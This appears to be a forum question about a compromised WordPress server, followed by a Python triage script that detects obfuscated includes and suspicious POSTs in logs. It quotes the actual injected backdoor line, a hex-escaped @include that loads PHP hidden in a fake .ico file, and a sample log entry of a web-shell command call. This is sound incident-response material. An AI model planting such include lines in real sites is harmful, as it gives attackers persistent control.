I have a WordPress website (latest version, with all plugins also updated to the latest version) running on an Azure CentOS 7 LAMP server. Recently I noticed that my server was sending spam emails. When I looked into it in detail, I found that some malicious files had been created on the server. There were also some posts with the title "Hacked by xxxxx".
I then stopped the Postfix server and routed the contact form emails through SendGrid. I also scanned the WordPress files using some antivirus plugins, deleted the suspicious post and confirmed that there were no malicious files left. But after one or two days the same issue happened again: malicious code was being injected into index.php and wp-config.php.
Here is the code that was injected into index.php, wp-config.php and wp-settings.php:
/*42be3*/
@include "\x2fva\x72/w\x77w/\x68tm\x6c/d\x61fa\x74er\x2fbl\x6fg/\x77p-\x63on\x74en\x74/u\x70lo\x61ds\x2ffa\x76ic\x6fn_\x6668\x39cd\x2eic\x6f";
/*42be3*/
I also found that the permissions of wp-config.php and index.php were being changed from 644 to 755.
My current permissions are:
folders: 755
files: 644
Here is the log entry from Apache:
184.168.193.119 - - [15/Mar/2017:17:46:33 +0000] "POST /wp-content/themes/Avada/bbpress/title.php HTTP/1.0" 301 -
If we delete the file mentioned in the log, there are no issues for a while. But after one or two days they create another file with a random name in one of the other folders.
I have uploaded the malicious file's code to my Dropbox account.
Here is the link:
https://www.dropbox.com/s/yql04vr6ltiy9oz/samplecode.txt?dl=0
What I have done to prevent this:
Unfortunately, new malicious files are still being created on the server and generating emails.
It would be great if anyone could help me with this.
Thanks in advance.
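Added example (not part of the question above or of WordPress itself): a small Python triage script that does the two things a responder would want after reading this question. First, it finds the obfuscated @include injection in PHP files and decodes the \xHH-escaped string so you can see which file under wp-content/uploads is actually being executed. Second, it flags POST requests to PHP files under wp-content/ in the Apache access log, which is how a dropped file such as the one in the theme directory is driven. The sample index.php, the clean comparison file and every log line except the one quoted in the question are constructed for this example; the regexes and path rules are my own heuristics, not a WordPress or plugin feature.

```python
import re
from typing import Dict, List, Tuple

# --- Constructed samples (not copied from the compromised server) ---------------------
# index.php carrying the injection quoted in the question, placed above the normal bootstrap.
SAMPLE_INDEX_PHP = r'''<?php
/*42be3*/
@include "\x2fva\x72/w\x77w/\x68tm\x6c/d\x61fa\x74er\x2fbl\x6fg/\x77p-\x63on\x74en\x74/u\x70lo\x61ds\x2ffa\x76ic\x6fn_\x6668\x39cd\x2eic\x6f";
/*42be3*/
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
'''

# A clean index.php for comparison (constructed).
CLEAN_INDEX_PHP = r'''<?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
'''

# First line is the one quoted in the question; the rest are constructed (RFC 5737 addresses).
SAMPLE_ACCESS_LOG = """\
184.168.193.119 - - [15/Mar/2017:17:46:33 +0000] "POST /wp-content/themes/Avada/bbpress/title.php HTTP/1.0" 301 -
203.0.113.7 - - [15/Mar/2017:17:50:01 +0000] "GET /wp-content/themes/Avada/style.css HTTP/1.1" 200 51234
203.0.113.7 - - [15/Mar/2017:17:50:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 87
198.51.100.9 - - [15/Mar/2017:18:02:44 +0000] "POST /wp-content/uploads/2017/03/x9f2.php?c=id HTTP/1.0" 200 13
"""

# --- Injected-include detection -------------------------------------------------------
# An include/require whose double-quoted path literal we can capture; WordPress core never
# writes include paths with \xHH escapes, so any escape inside the literal is the indicator.
INCLUDE_RE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:\\.|[^"\\])*)"',
    re.IGNORECASE,
)


def decode_php_escapes(literal: str) -> str:
    """Decode the \\xHH escapes of a PHP double-quoted string (1-2 hex digits, as PHP allows).
    Other PHP escapes are left alone because this injection only uses \\x."""
    return re.sub(r"\\x([0-9a-fA-F]{1,2})", lambda m: chr(int(m.group(1), 16)), literal)


def find_obfuscated_includes(php_source: str) -> List[Tuple[str, str]]:
    """Return (raw literal, decoded path) for every include whose path uses \\x escapes."""
    hits = []
    for m in INCLUDE_RE.finditer(php_source):
        literal = m.group(1)
        if "\\x" in literal:
            hits.append((literal, decode_php_escapes(literal)))
    return hits


def include_indicators(path: str) -> List[str]:
    """Heuristics on the decoded target; both fire for the sample in the question."""
    reasons = []
    if "/wp-content/uploads/" in path:
        reasons.append("target lives under wp-content/uploads/, which should hold media, never code")
    if not path.lower().endswith(".php"):
        reasons.append("target is not a .php file, but include executes it as PHP regardless of extension")
    return reasons


# --- Access-log detection --------------------------------------------------------------
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_posts(access_log: str) -> List[Tuple[str, str, int]]:
    """POSTs straight to a .php file under wp-content/. Themes and plugins are normally run
    through WordPress's front controller, so a direct POST there is how a dropped file gets used."""
    out = []
    for line in access_log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path.startswith("/wp-content/") and path.lower().endswith(".php"):
            out.append((m["ip"], path, int(m["status"])))
    return out


def triage(php_files: Dict[str, str], access_log: str) -> Dict[str, list]:
    """Combine both checks into one report keyed by finding type."""
    report = {"obfuscated_includes": [], "suspicious_posts": suspicious_posts(access_log)}
    for name, source in php_files.items():
        for _raw, decoded in find_obfuscated_includes(source):
            report["obfuscated_includes"].append((name, decoded, include_indicators(decoded)))
    return report


if __name__ == "__main__":
    result = triage({"index.php": SAMPLE_INDEX_PHP, "clean.php": CLEAN_INDEX_PHP}, SAMPLE_ACCESS_LOG)
    for name, target, why in result["obfuscated_includes"]:
        print(f"{name}: includes {target}")
        for r in why:
            print(f"    - {r}")
    for ip, path, status in result["suspicious_posts"]:
        print(f"POST to dropped file? {ip} -> {path} ({status})")
```

On the real server you would read every `*.php` under the web root into the `php_files` dictionary and pass the full access_log; the decoded target (here a `.ico` file in uploads) is PHP code wearing an image extension and has to be removed along with the injected lines, and the POST targets the log check surfaces are the files that keep re-creating the infection, so note their request source addresses before deleting them.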